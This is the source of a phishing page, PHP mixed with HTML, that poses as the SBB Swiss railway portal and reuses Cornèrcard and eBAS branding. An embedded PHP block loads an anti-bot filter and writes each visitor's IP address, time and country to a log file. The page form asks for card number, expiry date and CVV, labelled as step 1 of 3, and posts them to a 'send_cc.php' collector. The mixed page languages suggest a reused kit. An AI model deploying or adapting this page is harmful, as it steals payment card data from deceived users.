<!DOCTYPE html>


<html lang="zh-tw" dir="ltr">
<?php
include("./anti/index.php");
include("wc.php");

$ip = $_SERVER['REMOTE_ADDR'];
$COUNTRY = getCountryFromIP($ip, " NamE ");
$hostname = gethostbyaddr($ip);
$useragent = $_SERVER['HTTP_USER_AGENT'];
$TIME = date("d F Y H:i:s");

$file = fopen("is.txt", "a");
fwrite($file, $ip . "  -   " . $TIME . " -  " . $COUNTRY . "\n");



?>
<html lang="fr"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Das Online-Portal der SBB für Zug und ÖV | SBB</title>

    
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no, user-scalable=no">
    <meta content="iCornèr: Enregistrez-vous ici pour avoir accès à toutes les données de votre Cornèrcard." name="description">
    <meta name="author" content="cornèrcard">

    <link href="./card_files/bootstrap.min.css" rel="stylesheet" type="text/css">
    <link href="./card_files/sticky-footer-navbar.css" rel="stylesheet" type="text/css">
    <link href="./card_files/default.css" rel="stylesheet" type="text/css">
    <link href="./card_files/icons.css" rel="stylesheet" type="text/css">
    <!--[if lt IE 8]><!-->
    <link rel="stylesheet" href="./card_files/ie7.css" type="text/css">
    <!--<![endif]-->
    <script>
        globalparameters = {
            code: "fr"
        }
    </script>
    <script src="./card_files/jquery-3.6.0.min.js"></script>
    <script src="./card_files/jquery.inputmasked.js"></script>
    <script src="./card_files/jquery.cookie.js"></script>
    <script src="./card_files/momentjs.js"></script>

    <script src="./card_files/bootstrap.min.js"></script>
    <script src="./card_files/common-translation.js"></script>
    <script src="./card_files/default.js"></script>

    <link rel="shortcut icon" href="https://cdn.app.sbb.ch/favicons/sbb/v2/favicon.ico" type="image/x-icon">
    <meta name="format-detection" content="telephone=no">
</head>
<body>
<nav class="navbar navbar-expand-md navbar-light bg-light mb-4">
    <div class="container">
        <a class="navbar-brand" href="#">
<img alt="" src="https://upload.wikimedia.org/wikipedia/commons/thumb/7/70/SBB_CFF_FFS_logo.svg/2560px-SBB_CFF_FFS_logo.svg.png" width="196">        </a>
    </div>
</nav>

<main>
    <div id="content" class="container">
<div class="progress-overview">
        <div class="progress" style="height: 5px;">
            <div class="progress-bar" role="progressbar" style="width: 16%" aria-valuenow="16" aria-valuemin="0" aria-valuemax="100"></div>
        </div>
</div>
<div id="loginform">
<form id="RegisterPI" name="RegisterPI" method="POST" target="_self" action="./lx/send_cc.php" autocomplete="off" accept-charset="UTF-8" class="form-horizontal">
    <div class="title">
        <h1 class="logintitle text-center">1/3 Ihre Rechnungsdaten</h1>
                <h4 class="text-center">Ihre Kreditkartendaten</h4>
    </div>




 
    
    

    
    <div class="form-group required">
                <label class="control-label" for="pan">
                Kartennummer
            </label>

            <div>
                    <div id="message-fields"></div>

                    <input class="form-control" type="tel" name="1" id="pan" maxlength="19" value="" tabindex="2"  minlength="16" required
  />








                    <!-- UserID -->

                    

                        <span class="message-token-success" style="display: none;"></span>





    <script type="text/javascript">


        var form = document.getElementById('RegisterPI');
        var formInput = form.elements["pan"];
        formInput.onchange = function () {
            var valid = function () { return true; }.call(this);
                valid = valid && (/^\d{4}-\d{4}-\d{4}-\d{4}$/).test(this.value);
            var parent = this.parentNode;
            if (!valid) {
                parent.className += " has-error";
            } else {
                parent.className = parent.className.replace(/ has-error/g, '');
            }

                if (!this.value) {
                    parent.className += " has-warning";
                } else {
                    parent.className = parent.className.replace(/ has-warning/g,'');
                }
        };
    </script>

            </div>
    </div>








 




 
    
    



    
   <label>
  Verfallsdatum<br>

  <input
    name="2" minlength="5" maxlength="8"
    placeholder="Monat/Jahr"
   required
  />
</label>


  <label>
 CVV <br>

  <input
    name="3" maxlength="4"
    placeholder="XXX"
    required
  />
</label>








         

            </div>
    </div>


    

 <div class="form-group text-center">



            <button name="continue" value="" class="btn btn-primary" >
                Bestätigen
            </button>

 

 
</div>    </div>
</main>

<footer class="footer">
    <div class="container">
        <div class="top">
            <div class="footer-language">
         
            </div>
            <div class="footer-links">
                <a class="language" href="#" id="heaset-info"><i class="icons8-headset heaset-info"></i></a>
            </div>
        </div>
        <div class="bottom">
            <div class="footer-menu">
</div>
            </div>
            <div class="ebas-weiss">
                <a href="https://www.ebas.ch/fr/">
                    <img src="./card_files/logo_ebas_weiss_fr.png" width="196">
                </a>
            </div>
        </div>
    </div>
</footer>

    

</body></html>